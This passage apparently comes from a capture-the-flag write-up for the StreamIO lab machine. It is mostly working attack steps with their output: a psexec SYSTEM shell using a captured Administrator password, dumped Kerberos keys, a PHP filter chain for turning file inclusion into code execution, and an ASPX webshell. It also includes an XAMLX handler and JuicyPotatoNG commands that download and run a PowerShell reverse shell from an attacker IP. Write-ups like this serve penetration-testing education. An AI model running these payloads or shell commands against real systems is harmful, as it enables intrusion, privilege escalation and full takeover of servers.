DC$:aes256-cts-hmac-sha1-96:09fc28d01c1ecaa91ae8ad8238de658308f5d9fe5b2cd723bd415944cdbac25f
DC$:aes128-cts-hmac-sha1-96:425f9423b064756c2b479fe7e60b1163
DC$:des-cbc-md5:3e1ad0ce8cbce67c
[*] Cleaning up...
```

We can also use `psexec.py` to obtain a shell as system:

```console
opcode@debian$ psexec.py streamIO.htb/Administrator:'I-YwJhy][jZ4e$'@dc.streamIO.htb
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Requesting shares on dc.streamIO.htb.....
[*] Found writable share ADMIN$
[*] Uploading file JGHOdkzA.exe
[*] Opening SVCManager on dc.streamIO.htb.....
[*] Creating service Mbdk on dc.streamIO.htb.....
[*] Starting service Mbdk.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2928]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

## Unintended foothold - using PHP filters chain (failed)

After getting [LFI](#local-file-inclusion), we could have used [PHP filters chain](https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it) to directly transform the file inclusion primitive to RCE.  
We can use [PHP filter chain generator](https://github.com/synacktiv/php_filter_chain_generator)

```console
opcode@debian$ wget https://raw.githubusercontent.com/synacktiv/php_filter_chain_generator/main/php_filter_chain_generator.py
opcode@debian$ python3 php_filter_chain_generator.py --chain '<?=`$_GET[0]`?>  '
[+] The following gadget chain will generate the following code : <?=`$_GET[0]`?>    (base64 value: PD89YCRfR0VUWzBdYD8+ICAg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp
```

Ideally, this chain should have allowed RCE, but it did not.

## Unintended - XAMLX reverse shell and SeImpersonate

After getting a shell as `yoshihide` with [RFI](#remote-file-inclusion), skipping all steps and jumping straight to root is possible.

```console
PS C:\> Get-Acl -Path C:\inetpub\wwwroot | Format-List 


Path   : Microsoft.PowerShell.Core\FileSystem::C:\inetpub\wwwroot
Owner  : NT AUTHORITY\SYSTEM
Group  : NT AUTHORITY\SYSTEM
Access : NT AUTHORITY\LOCAL SERVICE Allow  FullControl
         NT AUTHORITY\LOCAL SERVICE Allow  268435456
         NT AUTHORITY\NETWORK SERVICE Allow  268435456
         NT AUTHORITY\NETWORK SERVICE Allow  FullControl
         BUILTIN\IIS_IUSRS Allow  -1610612736
         BUILTIN\IIS_IUSRS Allow  ReadAndExecute, Synchronize
         streamIO\yoshihide Allow  FullControl
         streamIO\yoshihide Allow  FullControl
         NT SERVICE\TrustedInstaller Allow  FullControl
         NT SERVICE\TrustedInstaller Allow  268435456
         NT AUTHORITY\SYSTEM Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  268435456
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Administrators Allow  268435456
         BUILTIN\Users Allow  ReadAndExecute, Synchronize
         BUILTIN\Users Allow  -1610612736
         CREATOR OWNER Allow  268435456
Audit  :
Sddl   : O:SYG:SYD:AI(A;;FA;;;LS)(A;OICIIO;GA;;;LS)(A;OICIIO;GA;;;NS)(A;;FA;;;NS)(A;OICIIO;GXGR;;;IS)(A;;0x1200a9;;;IS)(A;OICI;FA;;;S-1-5-21-1470860369-1569627196-4264678630-1107)(A;OICIID;FA;;;S-1-5-21-1470860369-1569627196-4264678630-1107)(A;ID;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;OICIIOID;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICIIOID;GA;;;BA)(A;ID;0x1200a9;;;BU)(A;OICIIOID;GXGR;;;BU)(A;OICIIOID;GA;;;CO)
```

Since `yoshihide` has `FullControl`, we can place an ASPX shell there:

```vbscript
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>
```

However, we'd receive a 404 on <http://streamio.htb/webshell.aspx?cmd=whoami>  
In his [video write-up for StreamIO](https://www.youtube.com/watch?v=3utO6ys2Rhg) `xct` mentions that the ASPX handler has been disabled in IIS manager to prevent the unintended route.  
Furthermore, he reveals an alternative to get `SeImpersonate`: [Getting Shell with XAMLX Files](https://research.nccgroup.com/2019/08/23/getting-shell-with-xamlx-files/)

`web.config`:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
 <system.webServer>
 <handlers accessPolicy="Read, Script, Write">
 <add name="xamlx" path="*.xamlx" verb="*" type="System.Xaml.Hosting.XamlHttpHandlerFactory, System.Xaml.Hosting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" modules="ManagedPipelineHandler" requireAccess="Script" preCondition="integratedMode" />
 <add name="xamlx-Classic" path="*.xamlx" verb="*" modules="IsapiModule" scriptProcessor="%windir%\Microsoft.NET\Framework64\v4.0.30319\aspnet_isapi.dll" requireAccess="Script" preCondition="classicMode,runtimeVersionv4.0,bitness64" />
 </handlers>
 <validation validateIntegratedModeConfiguration="false" />
 </system.webServer>
</configuration>
```

`shell.xamlx`:

```xml
<WorkflowService ConfigurationName="Service1" Name="Service1" xmlns="http://schemas.microsoft.com/netfx/2009/xaml/servicemodel" xmlns:p="http://schemas.microsoft.com/netfx/2009/xaml/activities" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:p1="http://schemas.microsoft.com/netfx/2009/xaml/activities" >
 <p:Sequence DisplayName="Sequential Service">
 <TransactedReceiveScope Request="{x:Reference __r0}">
 <p1:Sequence >
 <SendReply DisplayName="SendResponse" >
 <SendReply.Request>
 <Receive x:Name="__r0" CanCreateInstance="True" OperationName="SubmitPurchasingProposal" Action="testme" />
 </SendReply.Request>
 <SendMessageContent>
 <p1:InArgument x:TypeArguments="x:String">[System.Diagnostics.Process.Start("cmd.exe", "/c powershell IEX(IWR http://10.10.14.44:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.44 9001").toString()]</p1:InArgument>
 </SendMessageContent>
 </SendReply>
 </p1:Sequence>
 </TransactedReceiveScope>
 </p:Sequence>
</WorkflowService>
```

```console
PS C:\inetpub\wwwroot> iwr 10.10.14.44:8000/shell.xamlx -o shell.xamlx
PS C:\inetpub\wwwroot> iwr 10.10.14.44:8000/web.config -o web.config
```

Now, we can get a shell:

```console
opcode@debian$ curl -XPOST http://streamio.htb/shell.xamlx -H 'Content-Type: text/xml' -H 'SOAPAction: testme' -d '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body/></s:Envelope>'
```

On the listener:

```console
PS C:\windows\system32\inetsrv> whoami
streamio\yoshihide
```

We receive a shell as `yoshihide` again, but with `SeImpersonatePrivilege`:

```console
PS C:\windows\system32\inetsrv> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
```

`SeImpersonatePrivilege` can be exploited with a potato. I used [JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG):

```console
PS C:\Windows\Tasks> iwr 10.10.14.44:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
PS C:\Windows\Tasks> .\JuicyPotatoNG.exe -t * -p "cmd.exe" -a "/c powershell.exe IEX(IWR http://10.10.14.44:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.44 9001"
```

I received shell as `system`:

```console
PS C:\Windows\system32> whoami
nt authority\system
```
